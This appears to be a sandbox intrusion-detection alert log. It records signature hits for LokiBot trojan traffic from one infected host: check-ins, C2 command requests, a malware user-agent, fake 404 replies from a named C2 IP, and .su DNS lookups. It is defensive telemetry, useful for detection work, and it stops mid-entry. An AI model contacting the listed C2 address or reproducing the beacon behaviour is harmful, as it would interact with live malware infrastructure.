Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249753802024318 11/24/22-19:56:03.443038
SID:	2024318
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249753802024313 11/24/22-19:56:03.443038
SID:	2024313
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249730802024318 11/24/22-19:55:16.067382
SID:	2024318
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249747802021641 11/24/22-19:55:51.131718
SID:	2021641
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249738802025381 11/24/22-19:55:33.192742
SID:	2025381
Source Port:	49738
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249730802024313 11/24/22-19:55:16.067382
SID:	2024313
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249706802021641 11/24/22-19:54:29.062049
SID:	2021641
Source Port:	49706
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249705802025381 11/24/22-19:54:27.228813
SID:	2025381
Source Port:	49705
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.863229532014169 11/24/22-19:54:48.619009
SID:	2014169
Source Port:	63229
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249721802825766 11/24/22-19:54:56.896268
SID:	2825766
Source Port:	49721
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249722802024313 11/24/22-19:54:59.769485
SID:	2024313
Source Port:	49722
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 95.213.216.202 - Destination IP: 192.168.2.6

Timestamp:	95.213.216.202192.168.2.680497432025483 11/24/22-19:55:44.744520
SID:	2025483
Source Port:	80
Destination Port:	49743
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.849786532014169 11/24/22-19:54:27.135932
SID:	2014169
Source Port:	49786
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249725802024313 11/24/22-19:55:05.694279
SID:	2024313
Source Port:	49725
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249719802024318 11/24/22-19:54:53.033944
SID:	2024318
Source Port:	49719
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249722802024318 11/24/22-19:54:59.769485
SID:	2024318
Source Port:	49722
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249725802024318 11/24/22-19:55:05.694279
SID:	2024318
Source Port:	49725
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.856123532014169 11/24/22-19:55:33.111651
SID:	2014169
Source Port:	56123
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249697802021641 11/24/22-19:54:11.348011
SID:	2021641
Source Port:	49697
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249711802025381 11/24/22-19:54:38.624655
SID:	2025381
Source Port:	49711
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249736802825766 11/24/22-19:55:29.163584
SID:	2825766
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 95.213.216.202 - Destination IP: 192.168.2.6

Timestamp:	95.213.216.202192.168.2.680497292025483 11/24/22-19:55:15.362841
SID:	2025483
Source Port:	80
Destination Port:	49729
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 95.213.216.202 - Destination IP: 192.168.2.6

Timestamp:	95.213.216.202192.168.2.680497252025483 11/24/22-19:55:07.447890
SID:	2025483
Source Port:	80
Destination Port:	49725
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 95.213.216.202 - Destination IP: 192.168.2.6

Timestamp:	95.213.216.202192.168.2.680497212025483 11/24/22-19:54:58.247548
SID:	2025483
Source Port:	80
Destination Port:	49721
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249750802024318 11/24/22-19:55:57.329298
SID:	2024318
Source Port:	49750
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249737802021641 11/24/22-19:55:31.199874
SID:	2021641
Source Port:	49737
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249751802825766 11/24/22-19:55:59.376338
SID:	2825766
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249740802021641 11/24/22-19:55:37.776321
SID:	2021641
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 95.213.216.202 - Destination IP: 192.168.2.6

Timestamp:	95.213.216.202192.168.2.680497022025483 11/24/22-19:54:26.773719
SID:	2025483
Source Port:	80
Destination Port:	49702
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 95.213.216.202 - Destination IP: 192.168.2.6

Timestamp:	95.213.216.202192.168.2.680497062025483 11/24/22-19:54:30.867234
SID:	2025483
Source Port:	80
Destination Port:	49706
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249754802025381 11/24/22-19:56:04.818902
SID:	2025381
Source Port:	49754
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249699802825766 11/24/22-19:54:15.956073
SID:	2825766
Source Port:	49699
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249719802024313 11/24/22-19:54:53.033944
SID:	2024313
Source Port:	49719
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249734802021641 11/24/22-19:55:25.189583
SID:	2021641
Source Port:	49734
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249748802025381 11/24/22-19:55:53.130311
SID:	2025381
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249715802825766 11/24/22-19:54:47.405096
SID:	2825766
Source Port:	49715
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249732802021641 11/24/22-19:55:21.169470
SID:	2021641
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249709802021641 11/24/22-19:54:33.518227
SID:	2021641
Source Port:	49709
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249755802024318 11/24/22-19:56:06.881877
SID:	2024318
Source Port:	49755
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249741802025381 11/24/22-19:55:39.990050
SID:	2025381
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249755802024313 11/24/22-19:56:06.881877
SID:	2024313
Source Port:	49755
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249723802825766 11/24/22-19:55:01.692450
SID:	2825766
Source Port:	49723
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.865044532014169 11/24/22-19:55:27.077654
SID:	2014169
Source Port:	65044
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249726802021641 11/24/22-19:55:07.738200
SID:	2021641
Source Port:	49726
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249718802025381 11/24/22-19:54:50.807735
SID:	2025381
Source Port:	49718
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249727802024313 11/24/22-19:55:09.788187
SID:	2024313
Source Port:	49727
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249750802024313 11/24/22-19:55:57.329298
SID:	2024313
Source Port:	49750
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249727802024318 11/24/22-19:55:09.788187
SID:	2024318
Source Port:	49727
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249700802025381 11/24/22-19:54:18.249997
SID:	2025381
Source Port:	49700
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249733802024313 11/24/22-19:55:23.201569
SID:	2024313
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 95.213.216.202 - Destination IP: 192.168.2.6

Timestamp:	95.213.216.202192.168.2.680497472025483 11/24/22-19:55:52.860690
SID:	2025483
Source Port:	80
Destination Port:	49747
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.856086532014169 11/24/22-19:55:05.605111
SID:	2014169
Source Port:	56086
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249728802825766 11/24/22-19:55:11.780324
SID:	2825766
Source Port:	49728
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249733802024318 11/24/22-19:55:23.201569
SID:	2024318
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 95.213.216.202 - Destination IP: 192.168.2.6

Timestamp:	95.213.216.202192.168.2.680497502025483 11/24/22-19:55:59.104900
SID:	2025483
Source Port:	80
Destination Port:	49750
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249734802025381 11/24/22-19:55:25.189583
SID:	2025381
Source Port:	49734
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249742802024318 11/24/22-19:55:40.973542
SID:	2024318
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 95.213.216.202 - Destination IP: 192.168.2.6

Timestamp:	95.213.216.202192.168.2.680497532025483 11/24/22-19:56:04.545301
SID:	2025483
Source Port:	80
Destination Port:	49753
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 95.213.216.202 - Destination IP: 192.168.2.6

Timestamp:	95.213.216.202192.168.2.680497182025483 11/24/22-19:54:52.477982
SID:	2025483
Source Port:	80
Destination Port:	49718
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249751802024313 11/24/22-19:55:59.376338
SID:	2024313
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.860690532014169 11/24/22-19:56:01.353337
SID:	2014169
Source Port:	60690
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249748802024313 11/24/22-19:55:53.130311
SID:	2024313
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249701802825766 11/24/22-19:54:22.087876
SID:	2825766
Source Port:	49701
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.854903532014169 11/24/22-19:54:50.721248
SID:	2014169
Source Port:	54903
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249743802025381 11/24/22-19:55:42.875605
SID:	2025381
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249742802024313 11/24/22-19:55:40.973542
SID:	2024313
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 95.213.216.202 - Destination IP: 192.168.2.6

Timestamp:	95.213.216.202192.168.2.680497152025483 11/24/22-19:54:48.216785
SID:	2025483
Source Port:	80
Destination Port:	49715
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249736802021641 11/24/22-19:55:29.163584
SID:	2021641
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249739802024313 11/24/22-19:55:35.259290
SID:	2024313
Source Port:	49739
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249739802024318 11/24/22-19:55:35.259290
SID:	2024318
Source Port:	49739
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249745802021641 11/24/22-19:55:47.082758
SID:	2021641
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249748802024318 11/24/22-19:55:53.130311
SID:	2024318
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 95.213.216.202 - Destination IP: 192.168.2.6

Timestamp:	95.213.216.202192.168.2.680496992025483 11/24/22-19:54:17.569674
SID:	2025483
Source Port:	80
Destination Port:	49699
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 95.213.216.202 - Destination IP: 192.168.2.6

Timestamp:	95.213.216.202192.168.2.680497102025483 11/24/22-19:54:37.501776
SID:	2025483
Source Port:	80
Destination Port:	49710
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 95.213.216.202 - Destination IP: 192.168.2.6

Timestamp:	95.213.216.202192.168.2.680497122025483 11/24/22-19:54:42.610242
SID:	2025483
Source Port:	80
Destination Port:	49712
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.856547532014169 11/24/22-19:55:07.655761
SID:	2014169
Source Port:	56547
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249714802024313 11/24/22-19:54:45.091814
SID:	2024313
Source Port:	49714
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249720802021641 11/24/22-19:54:54.960633
SID:	2021641
Source Port:	49720
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249714802024318 11/24/22-19:54:45.091814
SID:	2024318
Source Port:	49714
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249725802025381 11/24/22-19:55:05.694279
SID:	2025381
Source Port:	49725
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249702802021641 11/24/22-19:54:25.054966
SID:	2021641
Source Port:	49702
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249711802021641 11/24/22-19:54:38.624655
SID:	2021641
Source Port:	49711
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.859504532014169 11/24/22-19:54:40.838615
SID:	2014169
Source Port:	59504
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249716802025381 11/24/22-19:54:48.704817
SID:	2025381
Source Port:	49716
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249698802021641 11/24/22-19:54:13.981663
SID:	2021641
Source Port:	49698
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249729802024318 11/24/22-19:55:13.852615
SID:	2024318
Source Port:	49729
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249700802024318 11/24/22-19:54:18.249997
SID:	2024318
Source Port:	49700
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249715802025381 11/24/22-19:54:47.405096
SID:	2025381
Source Port:	49715
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249723802024318 11/24/22-19:55:01.692450
SID:	2024318
Source Port:	49723
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249729802024313 11/24/22-19:55:13.852615
SID:	2024313
Source Port:	49729
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249723802024313 11/24/22-19:55:01.692450
SID:	2024313
Source Port:	49723
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.852556532014169 11/24/22-19:54:56.722023
SID:	2014169
Source Port:	52556
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249741802024318 11/24/22-19:55:39.990050
SID:	2024318
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249749802825766 11/24/22-19:55:55.139215
SID:	2825766
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249741802024313 11/24/22-19:55:39.990050
SID:	2024313
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249700802024313 11/24/22-19:54:18.249997
SID:	2024313
Source Port:	49700
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 95.213.216.202 - Destination IP: 192.168.2.6

Timestamp:	95.213.216.202192.168.2.680497202025483 11/24/22-19:54:56.488535
SID:	2025483
Source Port:	80
Destination Port:	49720
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249718802021641 11/24/22-19:54:50.807735
SID:	2021641
Source Port:	49718
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

Timestamp:	192.168.2.695.213.216.20249701802021641 11/24/22-19:54:22.087876
SID:	2021641
Source Port:	49701
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 95.213.216.202 - Destination IP: 192.168.2.6

Timestamp:	95.213.216.202192.168.2.680497482025483 11/24/22-19:55:54.888388
SID:	2025483
Source Port:	80
Destination Port:	49748
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 95.213.216.202

